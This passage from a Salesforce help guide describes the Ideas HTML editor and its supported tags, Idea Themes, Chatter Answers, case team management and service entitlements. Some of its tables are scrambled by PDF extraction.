• The data export feature archives all your Ideas data with the exception of deleted ideas and deleted comments.

• You cannot create activities and events for Ideas.

• When using standard or custom Idea fields, note the following:

◊ History tracking is not supported.

◊ Field dependencies and roll-up summary fields are not supported.

◊ Formula fields are not available for the Community object.

Tips for Using the HTML Editor
The HTML editor gives users WYSIWYG HTML editing capabilities, allowing them to:

• Insert an image

• Insert hyperlinks

• Change paragraph alignment

• Create bulleted and numbered lists

Implementation Tips

• HTML tags you enter into the HTML editor will display to users as text.
• In related lists, search results, and hover details, Salesforce does not display text with HTML formatting or images.
• Hyperlinks open in a new browser window when users click on them. The HTML editor supports HTTP, HTTPS, and

mailto hyperlinks.
• To insert an image, click  and either browse to an image file or specify the image's web address. Enter a description

that appears when a user hovers over the image and when the image is not available. The image must have a URL that
Salesforce can access.

• Images do not show up in list views and reports.
• You cannot disable individual features of the HTML editor. For example, you cannot disable its hyperlink and image

capabilities.
• The HTML editor supports all languages that Salesforce supports.
• For security purposes, the HTML editor only allows the tags and attributes listed in Supported HTML Tags and Attributes

on page 1787. Salesforce automatically removes unsupported tags and attributes when you save an idea description or comment.
Salesforce also removes potentially malicious HTML. Note that Salesforce does not notify users when unsupported or
potentially malicious HTML is removed.

• The HTML editor does not support JavaScript or Cascading Style Sheets (CSS).
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Supported HTML Tags and Attributes

The HTML editor supports the following tags:

<q><dt><a>

<samp><em><abbr>

<small><font><acronym>

<span><h1><address>

<strike><h2><b>

<strong><h3><bdo>

<sub><h4><big>

<sup><h5><blockquote>

<table><h6><br>

<tbody><hr><caption>

<td><i><cite>

<tfoot><img><code>

<th><ins><col>

<thead><kbd><colgroup>

<tr><li><dd>

<tt><ol><del>

<ul><p><dfn>

<var><pre><div>

<dl>

The above tags can include the following attributes:

sizefacealt

srcheightbackground

stylehrefborder

targetnameclass

widthrowspancolspan

The above attributes can include URLs that begin with the following:

• http:

• https:

• file:

• ftp:

• mailto:
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• #

• / for relative links

Enabling the HTML Editor in Ideas

The HTML editor is enabled by default for most organizations. If your organization does not have the HTML editor already
enabled, an administrator can enable it as described in Customizing Ideas Settings on page 2029.

Warning:  Once you enable the HTML editor, you cannot disable it.

Before enabling the HTML editor, note the following:

• Each HTML idea description has a maximum size of the 32 KB. Each comment has a maximum size of 4 KB.
• If you use the HTML editor to edit and save an idea description or comment that was in text format, Salesforce saves the

description or comment in HTML format.
• In list views and search results, Salesforce displays only the first 255 characters of an idea's description or comment. This

number includes HTML tags.

See Also:
Ideas Overview
Using Ideas
Commenting on Ideas
Posting and Editing Ideas

Idea Themes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Watch a Demo: Encourage Collaboration with Idea Themes (3:30 minutes)

Idea Themes lets you invite community members to post ideas about specific topics so that members can solve problems or
propose innovations for your company. For example, to engage with your community and create excitement around the launch
of a new product, you can ask members to work together to create the product’s name. Community members collaborate and
add ideas to the idea theme, while you monitor their activities as they vote and comment on each other’s ideas until they find
a winner.

When you create an idea theme, you can add pictures, videos, and other multimedia content to showcase or explain the idea
that you’re presenting to the community. You can also view and manage the list of ideas that have been posted to the idea
theme.
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See Also:
Creating and Editing Idea Themes
Using Idea Themes
Managing Idea Themes

Using Idea Themes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on Idea ThemesTo view the Idea Themes tab:

“Create” on IdeasTo create Idea Themes:

Click the Idea Themes tab to view, filter, moderate, and create themes from lists.

• Click Create New View to define your own custom list views. To edit or delete any view you created, select it from the
View drop-down list and click Edit. If your organization has multiple communities, we recommend you add Community
to your views so that you can see the name of the community associated with each idea theme. Adding the Zone field to
the view also helps with managing multiple zones.

• Click New Idea Theme from the Idea Themes list view page or click New from the Recent Idea Themes list on the Idea
Themes overview page to create a new idea theme.

• Click  to refresh a list that’s been updated.

• Click Edit or Del to edit or delete an idea theme.
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Note:  Deleting an idea theme also deletes the ideas that are associated with it. Conversely, undeleting an idea
theme also undeletes the ideas that are associated with it.

See Also:
Creating and Editing Idea Themes
Idea Themes
Managing Idea Themes

Creating and Editing Idea Themes

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on Idea ThemesTo view the Idea Themes tab:

“Create” on IdeasTo create Idea Themes:

You can use the Idea Themes tab in both the application and the console to create and edit Idea Themes for the communities
that you manage.

1. Click New Idea Theme from the Idea Themes list view page or click New from the Recent Idea Themes list on the Idea
Themes overview page.

2. Select a zone for the idea theme and click Continue.
3. Select the idea theme’s Status.
4. Select a category for the theme.
5. Add a title for the idea theme.
6. Optionally, enter a description of the theme.

Use the HTML editor to format your text or add an image or video.

7. Click Save.

See Also:
Idea Themes
Using Idea Themes
Managing Idea Themes
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Managing Idea Themes

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on Idea ThemesTo view the Idea Themes tab:

“Create” on IdeasTo create and edit Idea Themes:

From the Idea Themes detail page, you can manage an idea theme and its related ideas. As an administrator, you can perform
the following tasks:

• Edit, Delete, or Clone an idea theme.

• Edit or Delete ideas that have been submitted to the idea theme.

• Move an idea from one idea theme to another in your zones.

You can do this by editing the name of the idea, which removes the idea from the current idea theme and gives you the
opportunity to select a different idea theme.

• View the number of ideas that have been submitted for the idea theme. Merged ideas don’t appear in the list of submitted
ideas on the Idea Themes detail page and aren’t counted in the Submitted Ideas field.

• Create an idea and post it to the idea theme in which you’re working.

See Also:
Creating and Editing Idea Themes
Using Idea Themes

Chatter Answers Overview
Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

Chatter Answers integrates Cases, Answers, Force.com Sites, Customer Portal, and Salesforce Knowledge to provide you
with a zone for your customers. It lets your customers:

• Post, browse, and reply to questions.

• Delete their own questions and replies.

• Flag questions and replies as spam, hateful, or inappropriate.

• Receive emails when their questions are answered or when best answers are chosen for questions they’re following.

• Collaborate publicly or privately with support agents to resolve issues.

• Search and review articles from Salesforce Knowledge.

• Like a post or Salesforce Knowledge article to help determine its popularity.

• Upload photos of themselves to their user profiles.
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• View other users’ total number of posts and number of replies marked as best answers by others.

1. Search: Customers can search for existing questions before they post their own.
2. Reputation: Zone members can earn points and ratings that display on hover over their photos in the feed
3. Question: Customers can post a question to the zone for help.
4. Comment: Zone members and support agents can comment on the question, and the customer can select a comment as

the best answer.
5. Filter: Zone members and support agents can view questions and comments by specific topics.

Chatter Answers lets service organizations and support agents:

• Create multiple zones.

• Brand and customize zones.

• Respond to customers publicly or privately.

• Automate the creation of cases from questions via an Apex trigger and workflow rules.

• Deflect customer inquiries through participation.

• Encourage participation by publicly displaying user statistics.

• Moderate questions and answers from a Chatter Answers tab in Salesforce (or from the Service Cloud console).

A customer’s question is typically answered on Chatter Answers using one of these processes:

Question Answered by a
Salesforce Knowledge Article

Question Answered by a
Support Agent

Question Answered by the
Members within the Zone

Question Answered by a
Similar Question with a Best
Answer

1. A customer types a
question or keyword into

1. A customer types a
question or keyword into

1. A customer types a
question or keyword into

1. A customer types a
question or keyword into
Chatter Answers and
clicks Ask.

Chatter Answers and
clicks Ask.

Chatter Answers and
clicks Ask.

Chatter Answers and
clicks Ask.
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Question Answered by a
Salesforce Knowledge Article

Question Answered by a
Support Agent

Question Answered by the
Members within the Zone

Question Answered by a
Similar Question with a Best
Answer

2. A similar question with an
answer displays in search
results.

2.2.2. A similar Salesforce
Knowledge article with an
answer displays in search
results.

No similar questions
display in search results.

No similar questions
display in search results.

3. 3.The customer signs in to
Chatter Answers to post a
public question.

The customer signs in
Chatter Answers to post a
private question.

4.4. The private question is
converted to a case.

A zone member or support
agent reads the question
and adds a comment, 5. A support agent reads the

case and adds a privatewhich answers the
customer’s question. comment, which answers

the customer’s question.

See Also:
Chatter Answers Terminology

Chatter Answers Terminology

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

The following terms are used when describing Chatter Answers features and functionality.

Answers

Answers is a feature of the Community application that enables users to ask questions and have community members
post replies. Community members can then vote on the helpfulness of each reply, and the person who asked the question
can mark one reply as the best answer.

Article

Articles capture information about your company's products and services that you want to make available in your knowledge
base.

Best Answer

When a member of an answers community asks a question and other community members post a reply, the asker can
mark one of the replies as the best answer. The best answer then appears directly under the question (above the other
replies). Identifying the best answer helps other community members with the same question quickly find the most
relevant, useful information.

Flag

An icon that users can click on a question or reply to report it as spam, hateful, or inappropriate.
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Follow

A subscription to a question that lets you receive emails when someone answers or comments on a specific question.

Like

To show support or indicate quality or usefulness for a question, answer, or knowledge article.

Popular

Each question's popularity is based on the number of users who Like it within a certain amount of time.

Question

An issue posted to an answers community. When a community member asks a question, other community members
post replies to help resolve the question.

Question, Private

An issue posted to an answers community, but marked Private so that only support agents can view and respond to it.

Reply

The response to a question in an answers community. When community members reply to a question, the person who
asked the question can mark one of the replies as the best answer to resolve and close the question.

Topics

The sidebar that lists data categories from which your customers can browse questions and replies. For example, if you
have a zone for hardware products, your topics may include laptops, desktops, and printers.

Vote, Reply

In an answers community, a vote means you either like or dislike a reply to a question.

Zones

Zones organize ideas and questions into logical groups, with each zone having its own focus and unique ideas and
questions

See Also:
Chatter Answers Overview
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Using Chatter Answers
Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Read” on questionsTo view questions:

“Create” on questionsTo ask and reply to questions:

“Read” on caseTo view cases:

“Edit” on caseTo change cases:

“Edit Self-Service Users”To manage Chatter Answers (Customer Portal) users:

Chatter Answers lets you work with questions and cases that originate from customers in a zone. Once a customer posts a
question to the zone, you or other customers can reply. Questions are converted to cases when they’re marked Private, or
after a time specified by your administrator.

With Chatter Answers, you can:

• Reply to questions converted to cases.

• Create custom views for cases converted from questions by filtering on Case Origin.

• Upload a photo to your profile so that customers can see who you are.

• Work with Chatter Answers users, who are essentially Customer Portal users.

• Assign the Chatter Answers User feature license to portal users who don’t self-register so that they can access your
community.

• Use the Questions tab to moderate questions and to:

◊ Review lists of questions.

◊ Answer questions or add replies to questions.

◊ Manually escalate a question to a case.

◊ Delete questions or replies.

◊ Select best answers for questions.

◊ Promote helpful replies to Salesforce Knowledge articles

Note: We recommend that you assign a support agent to review public questions from the Questions tab. Agents
can’t click Flag next to questions or replies that are spam, hateful, or inappropriate, but they can edit and delete
questions or replies from a Web community via the Questions tab if they have the “Delete” permission on questions.
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Tip: To moderate many questions quickly, we recommend that support agents review questions from pinned lists
on the Service Cloud console (this requires adding the Questions tab to the console’s Navigation tab; see Creating a
Service Cloud Console App on page 2115).

See Also:
Chatter Answers Overview
Chatter Answers Terminology

Questions Home

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Questions tab:

"Create” on questionsTo ask and reply to questions:

“Delete” on questionsTo delete questions and replies:

“Create” on casesTo escalate a question to a case:

“Edit” on questionsTo edit questions:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

The Questions tab lets you view, search, filter, moderate, and create questions from lists.

• Search for questions by typing two or more letters of a question in the Search All Questions box. As you type, questions
that match your search terms appear.

• Select predefined list views from the View drop-down list. Some predefined lists from which you can filter questions
include:

◊ Questions with Best Replies

◊ Questions without Best Replies

• Click Create New View to define your own custom list views. To edit or delete any view you created, select it from the
View drop-down list and click Edit.

• Click New Question from the Questions list view page or click New from the Recent Questions list on the Questions
overview page to create a new question.

• Click  to refresh a list that’s been updated.

• After you select a question from the list:

1796

Using Chatter AnswersResolving Customer Inquiries



◊ Type an answer or comment and click Answer Customer & Zone to reply to customers.

◊ Click  and choose:

- Delete to delete the question from the community.

- Escalate to Case to create a case from the question.

- Edit to edit the fields in an existing question.

◊ Click  on one of the question’s replies and choose:

- Delete to delete the reply from the community.

- Promote to Article to add the reply as a draft article to the knowledge base (available if it’s set up by your
administrator).

- Edit to edit the fields in an existing reply.

◊ If the question is private, meaning only support agents can view and answer it, you can click the case link to view the
case automatically associated with the question.

Note:  The Questions tab is intended for Chatter Answers, but you can also use it to view questions from the answers
feature.

See Also:
Questions Home

Searching in Chatter Answers
Search Chatter Answers to find questions and replies, best answers, and Salesforce Knowledge articles that can help you resolve
your issue. Searching in Chatter Answers might eliminate the need to post a new question and can help you avoid posting
redundant questions.

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Read” on questionsTo view questions:

Searches in Chatter Answers return results from all of the zones that are available to you.

Note:  Searches performed by internal users return results from all questions that are available within the organization.
Searches performed by all other users in Salesforce Communities return results from the questions that are available
within the community.

1. Enter your question in the search box.
2. Click the magnifying glass.
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Searching in Chatter Answers returns results for best answers, open questions, and Salesforce Knowledge articles that match
your question search terms.

RESOLVING CUSTOMER INQUIRIES WITH OTHERS

Adding Case Team Members
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Edit” on casesTo add team members:

To add individual case team members or predefined case teams to a case:

1. View the case.
2. In the Case Team related list, click Update Case Team Members.
3. To add individual members to the case team:

a. Select the type of user from the Team Member picklist (either User, Contact, Portal User, or Partner User), and click

the lookup icon ( ) to choose a specific user.

Portal User and Partner User only display if a partner portal or Customer Portal is enabled for your organization.

High-volume portal users can’t be added to teams.

b. Select the case team role to apply to the team member from the Member Role picklist.

Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case Manager.”
Roles determine access to the case, like Read Only or Read/Write access, and whether the member in the role is visible
to users in the Customer Portal.

4. To add an existing case team, click the lookup icon ( ) in the Predefined Case Teams section and choose a specific team.
5. Click Save.

Tips on Adding Users to Case Teams

Consider the following when adding users to case teams:

• You cannot add a user to a case team if he or she is already on the case team. For example, if you add a predefined team
to a case that includes a member already on the team, then that member is automatically removed from the predefined
team when it is added to the case.
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• Contacts can only view cases via a Customer Portal.
• Customer Portal users can view the Case Team related list if it is included on case page layouts associated with their profile.

However, Customer Portal users cannot update case teams or view case team role details on cases.
• You can filter case lists by case teams where you are a member. Simply select the My Case Teams filter on case list views.

You can also report on case teams in which you are a member. After you run a case report, select My team's cases from the
View filter.

• The possible access levels a case team member can have on a case, as defined by your administrator via case team roles,
include:

DescriptionAccess Level

User can view and edit the record, and add associated
records, notes, and attachments to it.

Read/Write

User can view the record, and add associated records to it.
They cannot edit the record or add notes or attachments.

Read Only

User cannot access the record in any way.Private

Updating Case Team Members
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Edit” on casesTo add team members:

You can update case team members on a case.

1. View the case.
2. On the Case Team related list, click Update Case Team Members.
3. Optionally:

• Click the Remove link next to an existing team member or predefined case team to remove that member or team from
the case.

• Click the Add 1 Row link to add a new row with which you can add a case team member or predefined case team.
• On existing team member rows, you can:

◊ Select the type of user from the Team Member picklist (either User, Contact, Portal User, or Partner User), and

click the lookup icon ( ) to choose a specific user.
◊ Select the case team role to apply to the team member from the Member Role picklist.
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Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case
Manager.” Roles determine access to the case, like Read Only or Read/Write access, and whether the member in
the role is visible to users in the Customer Portal.

• On existing predefined case team rows, you can click the lookup icon ( ) to add a specific case team.

4. Click Save.

Tips on Updating Case Team Members

Consider the following when updating case team members:

• You cannot add a user to a case team if he or she is already on the case team. For example, if you add a predefined team
to a case that includes a member already on the team, then that member is automatically removed from the predefined
team when it is added to the case.

• When you remove a user or a predefined case team from a case, you can add the user or predefined case team back to the
case at any time.

• Contacts can only view cases via a Customer Portal.
• If you deactivate a user, Salesforce prompts you to remove him or her from case teams.
• Customer Portal users can view the Case Team related list if it is included on case page layouts associated with their profile.

However, Customer Portal users cannot update case teams or view case team role details on cases.
• The possible access levels a case team member can have on a case, as defined by your administrator via case team roles,

include:

DescriptionAccess Level

User can view and edit the record, and add associated
records, notes, and attachments to it.

Read/Write

User can view the record, and add associated records to it.
They cannot edit the record or add notes or attachments.

Read Only

User cannot access the record in any way.Private

See Also:
Adding Case Team Members
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Case Team Fields
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Edit” on casesTo add team members:

A case team member has the following fields, listed in alphabetical order.

DescriptionField

The level of access that a team member has to the case. The
access level can be Read/Write, Read Only, or Private; but it

Case Access

cannot be less than your organization's default case sharing
access.

The name of a user listed as part of the case team.Member Name

The role that the team member plays for the case, for example,
“Case Manager.”

Member Role

Indicates whether the case team member displays in the
Customer Portal.

Visible in Customer Portal

See Also:
Adding Case Team Members
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CREATING AND VERIFYING SERVICE AGREEMENTS

ENTITLEMENTS

Entitlements Overview
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Entitlements help you determine if your customers are eligible for customer support so you can create cases for them. A
customer may be eligible for support based on a particular asset, account, or service contract. You can use entitlements on their
own or in conjunction with entitlement processes, which are timelines that contain all of the steps (or milestones) that your
support team must complete in order to resolve cases.

Depending on how entitlements are set up, you can view and create them on the Entitlements tab or from the Entitlements
related list on accounts, contacts, assets, or service contracts. Click Create Case on the Entitlements related list to create a
case that automatically includes the correct entitlement, account, contact, and asset.

If set up, the Entitlements or Entitlement Template related lists let you add existing entitlements to contacts and products.

Note:  Entitlements don't automatically apply to cases created with Web-to-Case or Email-to-Case. If needed, you
can add entitlements to these features using Apex code.

See Also:
Setting Up Entitlements
Entitlement Management Overview
Getting Started with Entitlement Management
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Verifying Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view entitlements:

You may have to verify that contacts are eligible to receive customer support, or that a service contract includes an entitlement,
before you create or update cases. Depending on how entitlements are set up, you can verify them from these locations:

Steps To VerifyTo Confirm ThatVerify Entitlements From

A specific entitlement is available.Entitlements tab 1. Click the Entitlements tab.
2. Click an entitlement name.

At least one contact on the account is
eligible for support.

Accounts 1. View an account.
2. Confirm that an entitlement is on the

Entitlements related list.

Specific contacts are eligible for support.Contacts 1. View a contact.
2. Confirm that an entitlement is on the

Entitlements related list.

Specific assets (purchased products) are
eligible for support.

Assets 1. Locate an asset from a related list or
an assets list view on the Products
tab.

2. Click the asset name.
3. Confirm that an entitlement is on the

Entitlements related list.

A specific service contract includes
customer support.

Service contracts 1. Click the Service Contracts tab.
2. Click a service contract name.
3. Confirm that an entitlement is on the

Entitlements related list.
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Note:  After you verify an entitlement, you can click Create Case to create a new case associated with the entitlement.
The case automatically includes any account, contact, or asset information from the entitlement.

See Also:
Entitlement Management Overview
Cases Overview
Using the Entitlements Related List
Searching for Entitlements

Displaying and Editing Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view entitlements:

“Edit” on entitlementsTo change entitlements:

Displaying Entitlements

To view an entitlement's details, use the Entitlements tab, list pages, or the Entitlements related list on:
• Accounts

• Contacts

• Assets

• Service contracts

The Entitlements related list shows all the entitlements associated with that item.

To view an entitlement template's details, use the Entitlement Templates related list on products.

Your administrator determines where you can view entitlements and entitlement templates.

Editing Entitlements

To update an entitlement, click Edit, change the fields, and click Save.

Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

Entitlements Related Lists

The lower portion of an entitlement displays information related to it, including cases, contacts, milestones, history,
activities, notes, and attachments.

You can click:
• Items to display their details

• Show [number] more to increase the number of items in the list

• Go to list to display a page with the entire list.
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Sharing

You can't share entitlements. If an entitlement has an account, its sharing is inherited from account sharing.

Printing Entitlements

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

See Also:
Entitlement Management Overview
Entitlement Fields
Creating Entitlements
Deleting Entitlements
Verifying Entitlements
Searching for Entitlements
Entitlements Home

Entitlement Process Fields
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Here are an entitlement process' fields. Some of these fields may not be visible or editable depending on your page layout and
field-level security settings.

DescriptionField

How far along a case is to reaching an entitlement process's
milestones. You can click or hover your mouse pointer over

Timeline

each milestone to view its details. Milestones are represented
by these icons:
•

 Completed milestone
•

 Violated milestone

You can drag the Handle icon ( ) along the Timeline Zoom
tool to view past and future milestones.

When adding the Timeline field to case page layouts, click
the wrench icon ( ) next to it and select Show label so the
field name displays on cases.

The time the case entered an entitlement process. You can
update or reset the time if you have the “Edit” permission on
cases. When you reset the time:

Entitlement Process Start Time

• Closed or completed milestones aren't affected
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DescriptionField

• Incomplete milestones are recalculated based on the new
start time

The time the case exited an entitlement process.Entitlement Process End Time

Lets you stop an entitlement process on a case. This may be
necessary if you're waiting for a customer's response.

Stopped

Shows the date and time an entitlement process was stopped
on a case.

Stopped Since

Viewing Entitlement Lists
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view entitlement lists:

“Create” on entitlementsTo create entitlements:

The entitlements list page displays a list of entitlements. To show a filtered list of items, select a predefined list from the View
drop-down list, or click Create New View to define your own custom views. To edit or delete any view you created, select it
from the View drop-down list and click Edit. In Professional, Enterprise, Unlimited, and Developer Edition organizations
that have set up the console, you can view entitlement lists via the console's list view.

Depending on your user permissions on entitlements, you may see these buttons and links:

DescriptionButton or Link

Click to create a new entitlement.New Entitlement

Click to create a new case associated with the entitlement.Create Case

Click to edit an entitlement.Edit

Click to delete an entitlement.Del

See Also:
Entitlement Management Overview
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Searching for Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view entitlements:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create an entitlements list view to find entitlements that match specific criteria.

See Also:
Entitlement Management Overview

Creating Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Create” on entitlementsTo create or clone entitlements:

Entitlements specify if a contact or account is eligible to receive customer support.

To create entitlements:

1. Click New on the Entitlements tab or New Entitlement from the Entitlements related list on accounts, assets, or service
contracts.

Your administrator determines where you can create entitlements.

Note:

• To add existing entitlements to contacts, click Add Entitlements on the Entitlements related list.
• To add entitlement templates to products, click Add Entitlement Template on the Entitlement Templates

related list.

You can't create new entitlements on contacts or products.

2. Enter the following details:
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DescriptionField

The name of the account associated with the entitlement.

To quickly find an asset in the lookup dialog box, select
criteria from the Filter by fields. Administrators can set
lookup filters to restrict filter values and results.

Account Name

The name of the asset associated with the entitlement.

Assets represent specific products purchased by customers.

Asset Name

The entitlement's supported business hours.

Business hours on a case take precedence over business hours
on entitlements. Business hours on entitlements only add

Business Hours

business hours to cases created from entitlements. For
example, if you add an entitlement with business hours to a
case that already has business hours, the entitlement's
business hours are ignored.

Lets you limit the number of cases the entitlement supports.Per Incident

The total number of cases the entitlement supports.

This field is only available if Per Incident is selected.

Cases Per Entitlement

The name of the contract line item (product) associated with
the entitlement.

Contract Line Item

The last day the entitlement is in effect.End Date

The entitlement's name.

We recommend using a descriptive name , such as Phone
Support. This helps users better understand entitlements

Entitlement Name

when they see them on related lists for accounts, contacts,
and assets.

The name of the service contract associated with the
entitlement.

To quickly find a service contract in the lookup dialog box,
select criteria from the Filter by fields. Administrators
can set lookup filters to restrict filter values and results.

Service Contract

The first day the entitlement is in effect.Start Date

The entitlement process associated with the entitlement.

Entitlement processes are timelines that include all of the
steps (milestones) that your support team must complete to

Entitlement Process

resolve cases. Each process includes the logic necessary to
determine how to enforce the correct service level for your
customers.
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DescriptionField

The number of cases the entitlement can support. This field
decreases in value by one each time a case is created with
the entitlement.

This field is only available if Per Incident is selected.

Remaining Cases

The entitlement's status.

Status is determined by your organization’s current system
date and the entitlement’s Start Date and End Date.
The status is:

Status

• Active if the system date is greater than or equal to the
Start Date and less than or equal to the End Date.

• Expired if the system date is greater than the End Date.
• Inactive if the system date is less than the Start Date.

Represents the entitlement's status by displaying one of the
following icons:

Status Icon

•  Active
•  Expired
•  Inactive

The type of entitlement, such as Web or phone support.

Administrators can customize this field's values.

Type

3. Click Save.

Tip:  Click Clone on an entitlement to quickly create a new entitlement from an existing one. This helps you create
multiple entitlements for a customer.

See Also:
Entitlement Management Overview
Verifying Entitlements
Displaying and Editing Entitlements
Deleting Entitlements
Searching for Entitlements
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Deleting Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Delete” on entitlementsTo delete entitlements:

To delete an entitlement, click Del next to the entitlement on the entitlement list page, or click Delete on the entitlement
detail page.

Deleting an entitlement moves it to the Recycle Bin. Any notes, attachments, or activities associated with the entitlement are
also deleted. If you undelete the entitlement, any associated items are undeleted.

Note:

• The Del link and Delete button only display for users with the “Delete” permission on entitlements.

• You can't delete an entitlement with an active or closed case.

See Also:
Entitlement Management Overview
Searching for Entitlements

Using the Entitlements Related List
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on accounts, contacts, assets, or service contractsTo view entitlements on accounts, contacts, assets, or service
contracts:

“Edit” on accounts, contacts, assets, or service contractsTo edit entitlements on accounts, contacts, assets, or service
contracts:

“Create” on casesTo create cases:

“Edit” on entitlementsTo change entitlements:

The Entitlement related list displays a list of entitlements that apply to accounts, contacts, assets, or service contracts.
Entitlements help you determine if your customers are eligible for customer support. You can use entitlements to verify if you
can create cases for a customer.
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Administrators determine an Entitlements related list's availability and contents. The following options and information
display by default:

New Entitlement

Click this button to add a new entitlement to an account, contact, asset, or service contract.

Action

The actions you can perform on the entitlement:
• Click Create Case to create a new case that automatically includes the correct entitlement, account, contact, or asset.

• Click Edit to change the entitlement.

• Click Del to remove the entitlement.

Entitlement

The entitlement's name. Click to view the entitlement's details.

Start Date

The first day the entitlement is in effect.

End Date

The last day the entitlement is in effect.

Status

The entitlement's status.

See Also:
Verifying Entitlements
Entitlement Management Overview
Cases Overview
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Using the Contacts Related List on Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlements

AND

“Read” on contacts and “Read” on entitlement contacts

To view contacts on entitlements:

“Create” on casesTo create cases:

“Edit” on entitlementsTo change entitlements:

The Contacts related list on entitlements displays a list of contacts eligible to receive customer support. Your company may
not allow you to provide support to customers unless they're on this list.

Administrators determine the Contacts related list's availability and content. The following options and information display
by default:

Add

Click this button to add contact(s) to the entitlement.

To search for contacts, enter a name or part of a name in the text entry field and click Go!. Check the boxes next to the
contacts you want to add to the entitlement and click Insert Selected. Click Done to add the selected people.

Action

The actions you can perform on the contact:
• Click Create Case to create a new case that automatically includes the correct entitlement, account, contact, or asset.

• Click Remove to remove the contact from the entitlement.

Contact Name

The contact's name. Click to view the contact's details.

Added By

The name of the user who added the contact to the entitlement.

See Also:
Entitlement Management Overview
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Using the Milestones Related List on Entitlements
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view milestones on entitlements:

The Milestones related list on entitlements displays a list of milestones that apply to an entitlement. Milestones are required
steps in your support process. They're metrics that represent service levels to provide to each of your customers. Examples of
milestones include first response and resolution times on cases.

Administrators determine the Milestones related list's availability and contents. The following information displays by default:

Order

The order in which the milestone is processed if a case matches the criteria of more than one milestone in an entitlement
process.

Name

The milestone's name.

Description

The milestone's description.

Criteria

The criteria a case must meet for a milestone to apply to it. For example, Priority equals High.

Minutes to Complete Milestone

The amount of time to successfully complete the milestone. This field only displays the milestone's Time Trigger
(Minutes); it doesn't track whether the milestone status is complete or in violation on cases.

See Also:
Entitlement Management Overview
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Entitlements Home
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view the Entitlements tab:

“Read” on entitlementsTo view entitlements:

“Create” on entitlementsTo create entitlements:

Clicking on the Entitlements tab displays the Entitlements home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• If your administrator has set up the console to include entitlements, click the Console tab to find, view, and edit entitlements
and their associated records on one screen.

• In the Recent Entitlements section, select an item from the drop-down list to display a brief list of the top entitlements
matching that criteria. From the list, you can click any entitlement name to go directly to the entitlement. Toggle the
Show 25 items and Show 10 items links to change the number of items that display. The fields you see are determined by
the Entitlements Tab search layout defined by your administrator and by field-level security settings. The Recent
Entitlements choices are:

DescriptionRecent Entitlements Choice

The last ten or twenty-five entitlements you viewed, with
the most recently viewed entitlement listed first. This list is

Recently Viewed

derived from your recent items and includes records owned
by you and other users.

• In the Recent Entitlements section, click New to create a new entitlement.

• In the Reports section, click Go to Reports to create customized reports that include entitlements.

See Also:
Entitlement Management Overview
Creating Entitlements
Displaying and Editing Entitlements
Deleting Entitlements
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Entitlements History
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on entitlementsTo view entitlements:

The Entitlement History related list tracks entitlement changes. Any time a user modifies trackable standard or custom fields,
a new entry is added to the related list. All entries include the date, time, nature of the change, and who made the change.
Modifications to the related list itself aren't tracked.

See Also:
Entitlement Management Overview

Entitlement Fields
Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

Here are an entitlement's fields. Some of these fields may not be visible or editable depending on your page layout and field-level
security settings.

DescriptionField

The name of the account associated with the entitlement.

To quickly find an asset in the lookup dialog box, select criteria
from the Filter by fields. Administrators can set lookup
filters to restrict filter values and results.

Account Name

The name of the asset associated with the entitlement.

Assets represent specific products purchased by customers.

Asset Name

The entitlement's supported business hours.

Business hours on a case take precedence over business hours
on entitlements. Business hours on entitlements only add

Business Hours

business hours to cases created from entitlements. For example,
if you add an entitlement with business hours to a case that
already has business hours, the entitlement's business hours
are ignored.

Lets you limit the number of cases the entitlement supports.Per Incident
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DescriptionField

The total number of cases the entitlement supports.

This field is only available if Per Incident is selected.

Cases Per Entitlement

